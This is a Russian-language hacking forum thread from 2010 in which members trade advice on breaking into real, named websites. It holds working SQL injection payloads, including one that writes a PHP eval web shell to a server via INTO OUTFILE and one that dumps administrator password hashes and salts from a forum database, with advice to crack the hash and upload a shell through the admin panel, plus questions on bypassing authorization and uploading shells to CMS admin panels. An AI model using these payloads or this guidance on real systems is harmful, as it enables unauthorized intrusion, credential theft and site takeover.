Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. SENIA

    SENIA Elder - Старейшина

    Joined:
    22 Nov 2008
    Messages:
    478
    Likes Received:
    232
    Reputations:
    1
    Есть админка XOOPS cms. как залить шелл?
    На форуме ничего путевого не нашел.
     
  2. DrakonHaSh

    DrakonHaSh Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    118
    Likes Received:
    29
    Reputations:
    24
    парочка общих вопросов накопилась :)

    1. по mysql:
    1a.
    Code:
    +[color=red]or(1,1)[/color]=select+count(0),concat((select+version()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)group+by+2)
    
    как выделенная конструкция называется и где о ней можно почитать в доке по mysql ?

    1b.
    Code:
    SELECT 1 FROM news WHERE id=-1 UNION SELECT * FROM (SELECT * FROM (SELECT NAME_CONST((SELECT passhash FROM users LIMIT 1), 14[color=red])d[/color]) as t JOIN (SELECT NAME_CONST((SELECT passhash FROM users LIMIT 1), 14[color=red])e) b)a[/color]
    как выделенные конструкции называются и где об этом можно почитать в доке по mysql ?

    2. если есть код вида
    Code:
    $GetParam= $_GET["Param"];
    $query = "SELECT * FROM TableName WHERE ColunmName ='".$GetParam."'";
    $result = mysql_query($query)
    
    и magic_quotes_gpc = On
    то в общем случае сделать ничего нельзя ? [известные мне исключения - "двойной" запрос от Scipio и использование мультибайтовых кодировок (есть в блоге у Raz0r)] еще какие нить варианты есть ?
     
    #12922 DrakonHaSh, 14 May 2010
    Last edited: 14 May 2010
  3. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    1. как обойти авторизацию на папку?
    Например тут: http://cmj.com/admin

    2. Как найти полный путь к корню сайта на сервере?
     
    #12923 jecka3000, 14 May 2010
    Last edited: 14 May 2010
  4. kfor

    kfor Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    278
    Likes Received:
    48
    Reputations:
    29
    1) Никак
    2) Найти ошибку с раскрытием пути.

    http://prod1.cmj.com/articles/display_article.php?id=179548196+order+by+1--

    Вот скуля раскручивай может чего нарулишь там.

    Угар)) там даже раскручивать не надо ))
    http://prod1.cmj.com/admin/
    Вход в админку без авторизации))
     
    #12924 kfor, 14 May 2010
    Last edited: 14 May 2010
    1 person likes this.
  5. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    DrakonHaSh
    https://forum.antichat.ru/thread119047.html

    и П.С https://forum.antichat.ru/thread104591.html
     
  6. DrakonHaSh

    DrakonHaSh Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    118
    Likes Received:
    29
    Reputations:
    24
    пользоваться и применять я это умею :) вникни, пожалуйста, в то, что я спрашиваю:

    1. по mysql:
    1a.
    Code:
    +[color=red]or(1,1)[/color]=select+count(0),concat((select+version()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)group+by+2)
    
    как выделенная конструкция называется и где о ней можно почитать в доке по mysql ?

    1b.
    Code:
    SELECT 1 FROM news WHERE id=-1 UNION SELECT * FROM (SELECT * FROM (SELECT NAME_CONST((SELECT passhash FROM users LIMIT 1), 14[color=red])d[/color]) as t JOIN (SELECT NAME_CONST((SELECT passhash FROM users LIMIT 1), 14[color=red])e) b)a[/color]
    как выделенные конструкции называются и где об этом можно почитать в доке по mysql ?

    2. если есть код вида
    Code:
    $GetParam= $_GET["Param"];
    $query = "SELECT * FROM TableName WHERE ColunmName ='".$GetParam."'";
    $result = mysql_query($query)
    
    и magic_quotes_gpc = On
    то в общем случае сделать ничего нельзя ? [известные мне исключения - "двойной" запрос от Scipio и использование мультибайтовых кодировок (есть в блоге у Raz0r)] еще какие нить варианты есть ?
     
  7. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    ребят кто нибудь из вас имел дело с админским панелем Advanced Poll 2.08 ?
    и можно ли залить шелл через этот панель?
     
    _________________________
  8. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    не могу записать минишел, нужна ваша помощь:
    http://www.bzpower.com/story.php?ID=-4046+union+select+1,2,3,4,5,'<?php eval($_GET[‘e’]) ?>',7,8,9,10,11,12,13,14+INTO+OUTFILE+'/home/bzpower/public_html/story.php'--
     
  9. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    http://www.bzpower.com/story.php?ID=-4046+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+from+mysql.user--+

    //лей через форум



    http://www.bzpower.com/story.php?ID=-4046+union+select+1,2,3,4,5,6,concat_ws(0x3a,converge_id,converge_pass_hash,converge_pass_salt),8,9,10,11,12,13,14+from+ibf_members_converge--+

    расшифровываешь хеш админа, заливаешь шелл через админку форума
     
    #12929 .:[melkiy]:., 14 May 2010
    Last edited: 14 May 2010
    4 people like this.
  10. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4

    всмысле заюзать эксплоит под IP.Board?

    или если я не понял, продемонстрируй плыз=)
     
    #12930 jecka3000, 14 May 2010
    Last edited: 14 May 2010
  11. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    через sql вы никак не зальете т.к:
    1) нет прав
    2) magic_quotes_gpc=on
     
  12. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    1 http://dev.mysql.com/doc/refman/5.1/en/row-subqueries.html
    2 http://dev.mysql.com/doc/refman/5.0/en/select.html (все что после (A select_expr can be given an alias)
    3 нет
     
    _________________________
    5 people like this.
  13. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    нашел инъекцию...пока сам сайт показывать не буду, может быть и так будет понятно, что я хочу=)

    подобрал колво столбцов
    site.com/forum.php?id=65+union+select+1,2,3,4,5--
    пока все нормально, НО, как только я делаю так:
    site.com/forum.php?id=-65+union+select+1,2,3,4,5--

    или пытаюсь узнать версию


    site.com/forum.php?id=-65+union+select+version(),2,3,4,5--

    то старница обнрвляется и на пару секунд выводится информация, которая мне нужна, то есть принтабельный столбец и версия, а потом через несколько секунд страница сама делает редирект на site.com/login.php

    но этих пары секунд не достаточно, чтобы например разглядеть все названия столбцов и т.д.

    как сделать так, чтобы страница сама не обновлялась?
     
  14. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    нажми паузу
     
    _________________________
  15. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    В Google Chrome
    view-source:http://site.com/forum.php?id=-65+union+select+version(),2,3,4,5--

    В других браузерах:
    в настройках отключить автоматическое перенаправление
     
    1 person likes this.
  16. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    Пипл, подскажите скрипт (одним файлом) аналог phpmyadmin. А то весь его заливать на сервер через шел очень долго!

    И кто подскажет как юзать это http://www.exploit-db.com/list.php?description=SunOS+5.1
     
  17. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    GOGA075

    XMM...Зачем Тебе phpmyadmin? ты прямо из шелла можешь коннектится к mysql
     
    _________________________
  18. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    Konqi
    Нет функции изминения!
     
  19. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    rst mysql
     
  20. LaVey

    LaVey Banned

    Joined:
    27 Dec 2009
    Messages:
    12
    Likes Received:
    1
    Reputations:
    -4
    _http://www.adminer.org
    Было дело работал с ним..очень много глюков.
     
Thread Status:
Not open for further replies.